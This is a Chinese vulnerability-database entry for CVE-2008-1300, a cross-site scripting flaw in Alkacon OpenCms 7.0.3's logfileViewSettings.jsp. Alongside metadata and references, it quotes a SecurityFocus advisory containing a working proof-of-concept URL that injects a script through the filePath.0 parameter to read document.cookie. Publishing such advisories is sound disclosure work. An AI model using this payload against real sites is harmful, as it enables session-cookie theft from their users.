Alkacon OpenCms 'logfileViewSettings.jsp'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114726 漏洞类型 跨站脚本
发布时间 2008-03-08 更新时间 2008-09-05
CVE编号 CVE-2008-1300 CNNVD-ID CNNVD-200803-192
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/31365
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200803-192
|漏洞详情
AlkaconOpenCmssystem/workplace/admin/workplace/logfileview/logfileViewSettings.jsp中的LogfileViewerSettings函数存在的跨站脚本攻击漏洞会允许远程攻击者通过一个存档操作中的filePath.0参数来注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/28152/info

Alkacon OpenCms is prone to multiple input-validation vulnerabilities, including one cross-site scripting issue and a file-disclosure issue, because the application fails to properly sanitize user-supplied input.

Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to obtain information that could aid in further attacks.

OpenCms 7.0.3 is vulnerable; other versions may also be affected. 

http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true
&ok=Ok&action=save
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview
&elementname=undefined&page=page1&style=new
&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings
&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8
&filePath.0=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
|参考资料

来源:BID
名称:28152
链接:http://www.securityfocus.com/bid/28152
来源:BUGTRAQ
名称:20080308AlkaconOpenCmslogfileViewSettings.jspXSS,filedisclosure
链接:http://www.securityfocus.com/archive/1/archive/1/489291/100/0/threaded
来源:SECUNIA
名称:29278
链接:http://secunia.com/advisories/29278
来源:SREASON
名称:3731
链接:http://securityreason.com/securityalert/3731